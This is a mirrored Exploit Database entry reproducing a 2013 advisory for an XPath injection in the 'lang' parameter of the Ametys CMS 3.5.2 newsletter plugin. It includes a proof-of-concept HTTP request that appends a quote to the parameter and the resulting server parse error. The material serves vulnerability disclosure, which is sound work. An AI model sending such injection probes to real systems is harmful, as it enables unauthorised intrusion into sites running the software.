Ametys CMS 3.5.2 – ‘lang’ XPath Injection

• Exploit Database
• 30 阅读

• 作者： LiquidWorm
  日期： 2013-11-30
• 类别：

  • webapps
  平台：

  • java
• 来源：https://www.exploit-db.com/exploits/29918/

• Ametys CMS 3.5.2 (lang parameter) XPath Injection Vulnerability
  
  
  Vendor: Anyware Services
  Product web page: http://www.ametys.org
  Download: http://www.ametys.org/en/download/ametys-cms.html
  Affected version: 3.5.2 and 3.5.1
  
  Summary: Ametys is a Java-based open source CMS combining
  rich content with an easy-to-use and intuitive interface.
  
  Desc: Input passed via the 'lang' POST parameter in the
  newsletter plugin is not properly sanitised before being
  used to construct a XPath query for XML data. This can be
  exploited to manipulate XPath queries by injecting arbitrary
  XPath code.
  
  Tested on: Microsoft Windows 7 Ultimate (EN) 32bit
   Jetty 6.1.21
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2013-5162
  Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5162.php
  
  
  24.11.2013
  
  --
  
  
  
  Request:
  --------
  
  POST /cms/plugins/newsletter/category/nodes HTTP/1.1
  Host: 192.168.8.11:8080
  User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/25.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  X-Requested-With: XMLHttpRequest
  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  Referer: http://192.168.8.11:8080/cms/event/index.html
  Content-Length: 137
  Cookie: ametys.accept.non.supported.navigators=on; JSESSIONID=1na81i031qhdw; __utma=111872281.3880910164568079000.1385252858.1385252858.1385252858.1; __utmb=111872281.1.10.1385252858; __utmc=111872281; __utmz=111872281.1385252858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
  Connection: keep-alive
  Pragma: no-cache
  Cache-Control: no-cache
  
  sitename=event&categoriesOnly=&debug=%255Bobject%2520Object%255D&userLocale=en&siteName=event&skin=demo&categoryID=root&lang=en'&node=root
  
  
  Response:
  ---------
  
  HTTP/1.1 500 Internal Server Error
  Date: Sun, 24 Nov 2013 00:55:08 GMT
  Content-Type: text/html; charset=utf-8
  Server: Jetty(6.1.21)
  Content-Length: 27280
  
  ...
  ...
  org.apache.jackrabbit.spi.commons.query.xpath.ParseException:
  
  Encountered "\'//element(*, ametys:page)[@ametys-internal:tags =\'" at line 1, column 68.
  Was expecting one of:
  "or" ...
  "and" ...
  "div" ...
  "idiv" ...
  "mod" ...
  "*" ...
  "return" ...
  "to" ...
  "where" ...
  "intersect" ...
  "union" ...
  "except" ...
  <Instanceof> ...
  <Castable> ...
  "/" ...
  "//" ...
  "=" ...
  "is" ...
  ...
  ...